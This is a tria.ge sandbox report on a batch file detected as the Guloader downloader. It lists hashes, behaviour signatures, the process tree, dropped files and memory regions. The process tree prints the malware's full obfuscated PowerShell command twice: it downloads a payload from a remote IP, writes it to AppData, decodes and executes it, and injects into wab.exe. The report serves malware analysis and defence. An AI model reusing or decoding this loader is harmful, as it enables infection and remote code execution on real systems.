Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

SYN-M021012010530.bat

windows7-x64

10

SYN-M021012010530.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31/05/2024, 16:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SYN-M021012010530.bat

  • Size

    6KB

  • MD5

    01553a7a340cc74a5f1773cae16cebe6

  • SHA1

    e7712f5d585e5fe9ac92922b55a79a16540aa7e1

  • SHA256

    99f975270c9c758a4ee7600eb37843e77510a636759ee656c4953268ef8b9d88

  • SHA512

    c6135a2a62a65ec8d22cee340b095dedb1e0c260d7c506bd35167415fe75ebb66dc83cf2d2159b33677012255b9bdc41969fd7c2648c477858c0ea8c588de894

  • SSDEEP

    96:b7ge1uD/1+adiF2aYjsAhmbo/H5lAiDYShyrO0MuzC1jYRGbsz39qdUt:Xu+OiF2aYjsAhFFYfO0TzC1jY8bjY

Score
10/10
guloaderdownloaderexecution

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\SYN-M021012010530.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Untrickable='S';$Untrickable+='ubs';$Untrickable+='tri';$Outsped = 1;$Untrickable+='ng';Function Transfused($vauxhallian){$Gazi=$vauxhallian.Length-$Outsped;For( $Mustees=5;$Mustees -lt $Gazi;$Mustees+=6){$Hjarn234+=$vauxhallian.$Untrickable.Invoke( $Mustees, $Outsped);}$Hjarn234;}function Boarhound($Soothing){ . ($Kundebrevs) ($Soothing);}$Narcissisms85=Transfused 'KolonMKou aoDiamezNedt,iUnc elTournlVrelsaSkovm/ Boar5Avi p.Frihe0Ben.o Erhve(CatecWFedtpiGormanIna vd phaeoHov,dwBi lesAmazo M,nogN Eur,T,orsk Rel,k1Oblig0Fro,t. Rkke0 Anke;A bej TjeneWBrugsilistfnMobbe6Prere4.ilkn;Sli,d TvindxFag i6No ni4Fejlm;Udfor Pr,prTegnmv .usb:Indus1Restf2s.edm1Snden. Shee0Matem),liep RepouG.yanaeGravec ntrik C.acoHol,p/Cr.di2Cross0Maski1Visit0Ne.sk0Forbe1Tilgo0Teuto1 Isfl MaideFRedraiGrenarBlankeUnclefTilnro MedixUdvel/bullw1calli2D gra1Kanta.Nedst0P,odl ';$Sankes=Transfused 'AfdisUObli.sSemi.egrusvrEnerg- F meASvinggCanadeBemr,n funktHande ';$Ejendomshandlernes=Transfused ' HemohBaadstpresutApartpE asc: Elli/ Sign/Uhens1Ufiks9Phala4Cilif.Stats5 Valu9 Outs. B ev3atona0Middl. C,nt6Avnet/SmlerBCe suaPaleon BeskkOpsloeA soraKvindaMorannFagkldUnam,e NonirS alsn,ommueFuril.Hoft.rRygsvaSimulrA yth ';$Moneymakers=Transfused 'Defea>M.scl ';$Kundebrevs=Transfused ' EgunitreleeBoatsxSalme ';$Klistermrkers108='Decasualised';$Tipsy = Transfused 'Spin,eOroloc ,orsh.fdmpoBroom Finge%Canama.artopJunaspVickidT.mpaaKok,stCut,faS,ort%val.o\AnaloCSnapshPatrueMvedeeDroscp arrieU,pdrr Syst.AudioMd.nzieBrnehlTrueh Fej,&Udska&ub,tv Despee DigrcPrim,hUds aoMisco cimnetB owz ';Boarhound (Transfused ' egej$ mpesgEnvisl becaoEurovbBlrenacephilN opl: HenrTrammez Beara BrisrAntrkd Skino an.lmKlyves Dos,=Pro o( Ind.cB.wstmKlagedThirt ene,i/Kunstcunfor Bratt$FlitsTR gati BartpFjerdsResowyProte) Liz. ');Boarhound (Transfused 'U der$Byzong F,oclTeinooPedanbTmreraUnfr lAfson:B,tchAsi,shdCajepmFulwai Weekr Dif,aAfd llLoyalsRabbiuAndennPoresiFrossfdi.emo ummr .venmf rhaeHistorsul,e=Mungo$ OvarEStru,j UnnoeEksp,nRutefdAngeroCold.m undssReoxih U ruaStersnUngabdLyskolGiorgeDry,drTextunn,ncoeUnsy,sApyre.IndivsOrganpSi,delBilveiImpretMuli,(Skala$An.isMStopkoPl,cenDrke,e Aim.ySor emT lweaHendek NondeCys.orVent sLandk)Kdfar ');$Ejendomshandlernes=$Admiralsuniformer[0];$Atomforsgsstationernes= (Transfused 'Bifen$TroldgCholelBalthoS derbSenneaTakkelStrim:BarbaG Ban uRt romIntermbladdiinflafFedtsa SkilbNagger utoci pedak,raugkKil meLinearInela=GraniNMohabeBro,ewOverr-OrkanOSacrib tu.ijD.rryeSnapscOverstStumb OrmegS,nganyB.ndesSc,retsa.ire YounmTight.riddlNPreage Pan.t A es.DiftoWAscene Pi abIsbaaCKobbelSti.eiBac.leAfstbnOffert');$Atomforsgsstationernes+=$Tzardoms[1];Boarhound ($Atomforsgsstationernes);Boarhound (Transfused ' alis$SkibsGRetouuUplanm IndemFisteiInducf A nuaAnswebEsterr t,aciFor.jkAkkumkSwadle VelsrCop e.MurseHNo,saeDeseraVare.d AadseAgurkrFamilsrecan[Haand$SveskSaktieaCap,wnAfvbnkNonareAntigsSlu,c]Heime=Afkli$InterNButtoa dobbrDiscocPimariAn,res hetesSldnii DestsUdstrmsememssenio8Milkg5 Assi ');$Unheavenly=Transfused 'Nords$ForskGNon ruObtenmGokarmMultiiChirofPr,ssa ReplbKarrer Di.ciTailbk KalkkFri.re ,ibirReach.BarbeD.trioo reswSuggen Bolil SpheoSenila Ned,dTolstFStorei NytelGreene K tc(Fader$Spri EkonsejInt,reTi ocnNervodOxy eo UnobmDepers tilvh,paltaDegelnTy.etd TerrlLampeeNonexrJonatnDemodeBlou sFea l,camo $U,derTplagiaUdef.i,axmatKerne)P.nin ';$Tait=$Tzardoms[0];Boarhound (Transfused 'Brste$ Forhg De ilDe teoPrecobPalmeaSelidlaf.oe:S.rfeAPre.anachettSandpi Lab s LudeeSelvarDi.siaDoxyc3Block8Fin,s=b,rta( LiprT.nnebeD ambsflappt.lapp-InexpP KeanaVandpt Fo hhLegit ,lokp$ HagiTDokh aFr,teiAlfaqtUunds)tup.l ');while (!$Antisera38) {Boarhound (Transfused 'efter$RettegSvinglBulgaoMedinbRealta,eindlCider: l,teJBak,euDagspbKam,riUafstl hydea BehonG.anatd bfrlKittsy Bedr=Facet$EarlitTric,r Fejlu EndoeMy,me ') ;Boarhound $Unheavenly;Boarhound (Transfused 'StillSunde tGrovva U derK,miktbrems-ArkivS Forml Holoe MalteTordepCorpo Nonpu4 .ran ');Boarhound (Transfused 'E,end$Tolvtg MatelUnderoDemulbSolana Falcl Boli:Rom,nA .lenn n,nctP ntai,atansNasaleinhumrAldosa Sprd3Garvn8Lbetr=alexi(Daf.oTOrec,eHis.osSte.ot Unde-MaaneP,ateraE.obrtUmusih niti Drif$GenerT VomeaBge,ji Hjdetsa ro)Trykn ') ;Boarhound (Transfused 'Meldb$jagatgSadellOerkeoStillbTidssaRa,dalTurki:MoonsBEquisoMatior KlardRe.seeEstralPri.taStrafi GaesspensieResidsKom iaGrudgu Arb,cC,none Moi sIndhe=udski$BegregHaikwlKinkhoObf,sbStersaUv.erlArcad:DemanH Ko.pgEmanattekstnFragii Rentn Acing.vampsdebi.+Sr,il+Logge%Sorti$SpdbaA .ppedTvrsumRadiuiTrisurOrblea inanlAgr.ssEffigu EvolnKursiiSkrivfPlyn,opublir ndhmWispieUnparrFiske.WavabcV,rsloSommeuAdfr.n FanetUnmir ') ;$Ejendomshandlernes=$Admiralsuniformer[$Bordelaisesauces];}$Wardless=330494;$Dgnprven=29148;Boarhound (Transfused 'Zo fy$Dambrg NaselAfbilo tr abPlenaaAfganlappos:IndorXStjssiCrotavFl,tn Torva=Azu.e SkaltG Sli,ei.dfatAnaly-Ash,aCCyanko MaitnPrototS,icieErsarnCu,ritNumba Ger,f$ F.lmTEp raaPediaiteddytskure ');Boarhound (Transfused 'Putti$Resergcroatl Dd aoFa,gebBrnehaR,ttilPic,o: F,rmFskrkrrP.rnoa CentgAandst DonnvS.abeo ussbgBunkenDrivbeUndoin Psyc3Dia,r7herr. Ed.ta=Vensk Illud[PresuSB.msey DilesSa kttTykkee AbscmIdris.NoncoCkarbooBla jnManeuvFrilaePoikirAden.t ,roc]Star :Afkas:RenomF Galvr.nfamoUnco m RevuB AppraCondosJubileSalis6Kolle4Pseu,SUndertSttedrIl.egiO,sknnPl.stg .bev(,laze$FikssX.ebraiP,litvTrans)Vedho ');Boarhound (Transfused 'Op,id$Sl,mbgRefuslSokk.o .aseb.ongoaHobn,l,imax:impecW,ystoaAbsorhCa lic Besto allanFeeb,d SympaUnsac Kurto= Siru Aftal[ TndrS,lyssy Di es Br,ttUnmone dfalm,rels.U obtT,unstesagn,xudrykt .dgi.,emonEAffejnTredjcReforo MahsdBr deiMorganPlasmgGenfr]Chin,: Thru:.onisAReclaS Sa,lC ,ordIfljfoIThres.FremsGAntileU afftRvekaSTrindtEnarcrAttraiAm,ulnFinnegLesfo(Skele$culleF G.orr utlaaGteskg Sikst MirtvSluknoLandggDumpenCalcie helbnNyma,3Gelda7Udbud)ki,an ');Boarhound (Transfused 'Marke$ UnargTrilil AntaosddonbFloosaBactrl.nmar:JenhaE rremk,ogoms Septp jon.o wla r.odretSaltkp,restrVmme.iFluessRundt=Un dr$Pr.esW.rbejaHobomhNeurocBiledoEntomnHyalodPunktaIn,bo.Glazis S ubuIn,erbVers.sHunnetStvnerKodili prehnTrac,gRekvi( Udvi$ BrutWRetr a utvorCo.ladUdskilStutte aaresD plisReple,Begra$ Pro,D AltegTredjn AppopStonyrSl unvAcroreCautin ,lun)mdepl ');Boarhound $Eksportpris;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheeper.Mel && echo t"
        3⤵
          PID:2920
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Untrickable='S';$Untrickable+='ubs';$Untrickable+='tri';$Outsped = 1;$Untrickable+='ng';Function Transfused($vauxhallian){$Gazi=$vauxhallian.Length-$Outsped;For( $Mustees=5;$Mustees -lt $Gazi;$Mustees+=6){$Hjarn234+=$vauxhallian.$Untrickable.Invoke( $Mustees, $Outsped);}$Hjarn234;}function Boarhound($Soothing){ . ($Kundebrevs) ($Soothing);}$Narcissisms85=Transfused 'KolonMKou aoDiamezNedt,iUnc elTournlVrelsaSkovm/ Boar5Avi p.Frihe0Ben.o Erhve(CatecWFedtpiGormanIna vd phaeoHov,dwBi lesAmazo M,nogN Eur,T,orsk Rel,k1Oblig0Fro,t. Rkke0 Anke;A bej TjeneWBrugsilistfnMobbe6Prere4.ilkn;Sli,d TvindxFag i6No ni4Fejlm;Udfor Pr,prTegnmv .usb:Indus1Restf2s.edm1Snden. Shee0Matem),liep RepouG.yanaeGravec ntrik C.acoHol,p/Cr.di2Cross0Maski1Visit0Ne.sk0Forbe1Tilgo0Teuto1 Isfl MaideFRedraiGrenarBlankeUnclefTilnro MedixUdvel/bullw1calli2D gra1Kanta.Nedst0P,odl ';$Sankes=Transfused 'AfdisUObli.sSemi.egrusvrEnerg- F meASvinggCanadeBemr,n funktHande ';$Ejendomshandlernes=Transfused ' HemohBaadstpresutApartpE asc: Elli/ Sign/Uhens1Ufiks9Phala4Cilif.Stats5 Valu9 Outs. B ev3atona0Middl. C,nt6Avnet/SmlerBCe suaPaleon BeskkOpsloeA soraKvindaMorannFagkldUnam,e NonirS alsn,ommueFuril.Hoft.rRygsvaSimulrA yth ';$Moneymakers=Transfused 'Defea>M.scl ';$Kundebrevs=Transfused ' EgunitreleeBoatsxSalme ';$Klistermrkers108='Decasualised';$Tipsy = Transfused 'Spin,eOroloc ,orsh.fdmpoBroom Finge%Canama.artopJunaspVickidT.mpaaKok,stCut,faS,ort%val.o\AnaloCSnapshPatrueMvedeeDroscp arrieU,pdrr Syst.AudioMd.nzieBrnehlTrueh Fej,&Udska&ub,tv Despee DigrcPrim,hUds aoMisco cimnetB owz ';Boarhound (Transfused ' egej$ mpesgEnvisl becaoEurovbBlrenacephilN opl: HenrTrammez Beara BrisrAntrkd Skino an.lmKlyves Dos,=Pro o( Ind.cB.wstmKlagedThirt ene,i/Kunstcunfor Bratt$FlitsTR gati BartpFjerdsResowyProte) Liz. ');Boarhound (Transfused 'U der$Byzong F,oclTeinooPedanbTmreraUnfr lAfson:B,tchAsi,shdCajepmFulwai Weekr Dif,aAfd llLoyalsRabbiuAndennPoresiFrossfdi.emo ummr .venmf rhaeHistorsul,e=Mungo$ OvarEStru,j UnnoeEksp,nRutefdAngeroCold.m undssReoxih U ruaStersnUngabdLyskolGiorgeDry,drTextunn,ncoeUnsy,sApyre.IndivsOrganpSi,delBilveiImpretMuli,(Skala$An.isMStopkoPl,cenDrke,e Aim.ySor emT lweaHendek NondeCys.orVent sLandk)Kdfar ');$Ejendomshandlernes=$Admiralsuniformer[0];$Atomforsgsstationernes= (Transfused 'Bifen$TroldgCholelBalthoS derbSenneaTakkelStrim:BarbaG Ban uRt romIntermbladdiinflafFedtsa SkilbNagger utoci pedak,raugkKil meLinearInela=GraniNMohabeBro,ewOverr-OrkanOSacrib tu.ijD.rryeSnapscOverstStumb OrmegS,nganyB.ndesSc,retsa.ire YounmTight.riddlNPreage Pan.t A es.DiftoWAscene Pi abIsbaaCKobbelSti.eiBac.leAfstbnOffert');$Atomforsgsstationernes+=$Tzardoms[1];Boarhound ($Atomforsgsstationernes);Boarhound (Transfused ' alis$SkibsGRetouuUplanm IndemFisteiInducf A nuaAnswebEsterr t,aciFor.jkAkkumkSwadle VelsrCop e.MurseHNo,saeDeseraVare.d AadseAgurkrFamilsrecan[Haand$SveskSaktieaCap,wnAfvbnkNonareAntigsSlu,c]Heime=Afkli$InterNButtoa dobbrDiscocPimariAn,res hetesSldnii DestsUdstrmsememssenio8Milkg5 Assi ');$Unheavenly=Transfused 'Nords$ForskGNon ruObtenmGokarmMultiiChirofPr,ssa ReplbKarrer Di.ciTailbk KalkkFri.re ,ibirReach.BarbeD.trioo reswSuggen Bolil SpheoSenila Ned,dTolstFStorei NytelGreene K tc(Fader$Spri EkonsejInt,reTi ocnNervodOxy eo UnobmDepers tilvh,paltaDegelnTy.etd TerrlLampeeNonexrJonatnDemodeBlou sFea l,camo $U,derTplagiaUdef.i,axmatKerne)P.nin ';$Tait=$Tzardoms[0];Boarhound (Transfused 'Brste$ Forhg De ilDe teoPrecobPalmeaSelidlaf.oe:S.rfeAPre.anachettSandpi Lab s LudeeSelvarDi.siaDoxyc3Block8Fin,s=b,rta( LiprT.nnebeD ambsflappt.lapp-InexpP KeanaVandpt Fo hhLegit ,lokp$ HagiTDokh aFr,teiAlfaqtUunds)tup.l ');while (!$Antisera38) {Boarhound (Transfused 'efter$RettegSvinglBulgaoMedinbRealta,eindlCider: l,teJBak,euDagspbKam,riUafstl hydea BehonG.anatd bfrlKittsy Bedr=Facet$EarlitTric,r Fejlu EndoeMy,me ') ;Boarhound $Unheavenly;Boarhound (Transfused 'StillSunde tGrovva U derK,miktbrems-ArkivS Forml Holoe MalteTordepCorpo Nonpu4 .ran ');Boarhound (Transfused 'E,end$Tolvtg MatelUnderoDemulbSolana Falcl Boli:Rom,nA .lenn n,nctP ntai,atansNasaleinhumrAldosa Sprd3Garvn8Lbetr=alexi(Daf.oTOrec,eHis.osSte.ot Unde-MaaneP,ateraE.obrtUmusih niti Drif$GenerT VomeaBge,ji Hjdetsa ro)Trykn ') ;Boarhound (Transfused 'Meldb$jagatgSadellOerkeoStillbTidssaRa,dalTurki:MoonsBEquisoMatior KlardRe.seeEstralPri.taStrafi GaesspensieResidsKom iaGrudgu Arb,cC,none Moi sIndhe=udski$BegregHaikwlKinkhoObf,sbStersaUv.erlArcad:DemanH Ko.pgEmanattekstnFragii Rentn Acing.vampsdebi.+Sr,il+Logge%Sorti$SpdbaA .ppedTvrsumRadiuiTrisurOrblea inanlAgr.ssEffigu EvolnKursiiSkrivfPlyn,opublir ndhmWispieUnparrFiske.WavabcV,rsloSommeuAdfr.n FanetUnmir ') ;$Ejendomshandlernes=$Admiralsuniformer[$Bordelaisesauces];}$Wardless=330494;$Dgnprven=29148;Boarhound (Transfused 'Zo fy$Dambrg NaselAfbilo tr abPlenaaAfganlappos:IndorXStjssiCrotavFl,tn Torva=Azu.e SkaltG Sli,ei.dfatAnaly-Ash,aCCyanko MaitnPrototS,icieErsarnCu,ritNumba Ger,f$ F.lmTEp raaPediaiteddytskure ');Boarhound (Transfused 'Putti$Resergcroatl Dd aoFa,gebBrnehaR,ttilPic,o: F,rmFskrkrrP.rnoa CentgAandst DonnvS.abeo ussbgBunkenDrivbeUndoin Psyc3Dia,r7herr. Ed.ta=Vensk Illud[PresuSB.msey DilesSa kttTykkee AbscmIdris.NoncoCkarbooBla jnManeuvFrilaePoikirAden.t ,roc]Star :Afkas:RenomF Galvr.nfamoUnco m RevuB AppraCondosJubileSalis6Kolle4Pseu,SUndertSttedrIl.egiO,sknnPl.stg .bev(,laze$FikssX.ebraiP,litvTrans)Vedho ');Boarhound (Transfused 'Op,id$Sl,mbgRefuslSokk.o .aseb.ongoaHobn,l,imax:impecW,ystoaAbsorhCa lic Besto allanFeeb,d SympaUnsac Kurto= Siru Aftal[ TndrS,lyssy Di es Br,ttUnmone dfalm,rels.U obtT,unstesagn,xudrykt .dgi.,emonEAffejnTredjcReforo MahsdBr deiMorganPlasmgGenfr]Chin,: Thru:.onisAReclaS Sa,lC ,ordIfljfoIThres.FremsGAntileU afftRvekaSTrindtEnarcrAttraiAm,ulnFinnegLesfo(Skele$culleF G.orr utlaaGteskg Sikst MirtvSluknoLandggDumpenCalcie helbnNyma,3Gelda7Udbud)ki,an ');Boarhound (Transfused 'Marke$ UnargTrilil AntaosddonbFloosaBactrl.nmar:JenhaE rremk,ogoms Septp jon.o wla r.odretSaltkp,restrVmme.iFluessRundt=Un dr$Pr.esW.rbejaHobomhNeurocBiledoEntomnHyalodPunktaIn,bo.Glazis S ubuIn,erbVers.sHunnetStvnerKodili prehnTrac,gRekvi( Udvi$ BrutWRetr a utvorCo.ladUdskilStutte aaresD plisReple,Begra$ Pro,D AltegTredjn AppopStonyrSl unvAcroreCautin ,lun)mdepl ');Boarhound $Eksportpris;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2524
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheeper.Mel && echo t"
            4⤵
              PID:2576
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:832
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:2396
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                  • Suspicious use of NtCreateThreadExHideFromDebugger
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:2636

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Cheeper.Mel
            Filesize

            468KB

            MD5

            3ced6d4c368b3c146f505b8834acbbf5

            SHA1

            52aa294e59e4f7440ee0d9bd354ce5e34389607f

            SHA256

            83f9727eb2df307d1ced9de81d6f3ceec82f0d36bf7895dc2275d63eaa66789c

            SHA512

            9c3dea4f1b836a564b8bf650d04f9b14e034c4fa3dc04acb3114fd1d53e7fb2c765a6f4db7056e75d03f4037562b1ed0a5f4b358929a44c2b68f72e7df342c73

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K67XX452UIA8KMTJSWHL.temp
            Filesize

            7KB

            MD5

            0d01312afa2c7110e4911a56d514c441

            SHA1

            d870e3044504eb5678d87a056f612ec1aaed0151

            SHA256

            a4145425b56cd75844dfd6d462035af1fab6cb443e1f8a34ddca6b8fbb038a2d

            SHA512

            6a182a05383ec8e53d9e54c51c475f41b191bf1820bdca35eb76823ae6cf063bc8c6ed9289b5cd0f8184c1fb608569f00c6c5ca98bac2e6ad712146aa1e249e0

            Download Submit

          • memory/2524-18-0x0000000006300000-0x000000000BEAA000-memory.dmp

            Filesize

            91.7MB

            Download

          • memory/2636-21-0x0000000000400000-0x0000000000581000-memory.dmp

            Filesize

            1.5MB

            Download

          • memory/2636-22-0x0000000000E30000-0x00000000069DA000-memory.dmp

            Filesize

            91.7MB

            Download

          • memory/2636-29-0x0000000000E30000-0x00000000069DA000-memory.dmp

            Filesize

            91.7MB

            Download

          • memory/2636-30-0x0000000000400000-0x0000000000581000-memory.dmp

            Filesize

            1.5MB

            Download

          • memory/2952-17-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2952-6-0x00000000023A0000-0x00000000023A8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2952-16-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2952-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2952-5-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/2952-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2952-23-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2952-7-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2952-10-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/2952-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

            Download